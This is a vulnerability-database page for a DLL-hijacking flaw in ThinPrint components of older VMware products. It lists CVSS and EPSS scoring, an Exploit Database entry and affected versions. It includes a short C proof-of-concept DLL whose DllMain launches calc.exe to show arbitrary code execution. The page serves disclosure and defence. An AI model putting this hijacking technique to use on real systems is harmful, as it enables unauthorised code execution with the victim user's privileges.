Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6.9 |
|
AV:L/AC:M/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 37780
Publication date : 2012-09-03 22h00 +00:00
Author : Moshe Zioni
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/55421/info
ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.
Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application.
#include <windows.h>
int hijack_poc ()
{
WinExec ( "calc.exe" , SW_NORMAL );
return 0 ;
}
BOOL WINAPI DllMain
( HINSTANCE hinstDLL ,
DWORD dwReason ,
LPVOID lpvReserved )
{
hijack_poc () ;
return 0 ;
}
Products Mentioned
Configuraton 0
Vmware>>Workstation >> Version To (including) 8.0.3
Vmware>>Workstation >> Version 8.0
Vmware>>Workstation >> Version 8.0.0.18997
Vmware>>Workstation >> Version 8.0.1
Vmware>>Workstation >> Version 8.0.1.27038
Vmware>>Workstation >> Version 8.0.2
Configuraton 0
Vmware>>Player >> Version To (including) 4.0.3
Vmware>>Player >> Version 4.0
Vmware>>Player >> Version 4.0.0.18997
Vmware>>Player >> Version 4.0.1
Vmware>>Player >> Version 4.0.2
Configuraton 0
Vmware>>Fusion >> Version To (including) 4.1.1
Vmware>>Fusion >> Version 4.0
Vmware>>Fusion >> Version 4.0.1
Vmware>>Fusion >> Version 4.0.2
Vmware>>Fusion >> Version 4.1
Configuraton 0
Vmware>>View >> Version To (including) 5.0
Vmware>>View >> Version 4.6.0
Configuraton 0
Vmware>>Esx >> Version 4.1
Vmware>>Esx >> Version 5.0
References